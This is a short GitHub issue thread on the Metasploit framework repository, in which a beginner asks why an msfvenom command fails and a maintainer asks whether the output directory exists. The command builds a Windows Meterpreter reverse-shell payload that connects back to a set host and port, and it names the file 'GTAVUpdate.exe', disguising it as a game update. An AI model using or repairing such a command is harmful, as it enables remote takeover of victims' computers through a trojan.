### ISSUE TITLE
Im Unable To Create This Thing!!  Please Help Me Im a Rookie !

### ISSUE THREAD

**Issue by AnonyYash** [rapid7/metasploit-framework#16291]
sfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe

Try running it in ur root

1. Enter Root Mode By sudo -i
2. Now Try Running The Code Above

When I Try To Run This I get

`msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe`

![image](https://user-images.githubusercontent.com/82389563/156891854-82e07aee-2796-4d5c-b07e-0e1e81edc2c9.png)

OS - Kali Linux

**Comment by bcoles** [comment]
Does the `/root/Desktop directory exist?
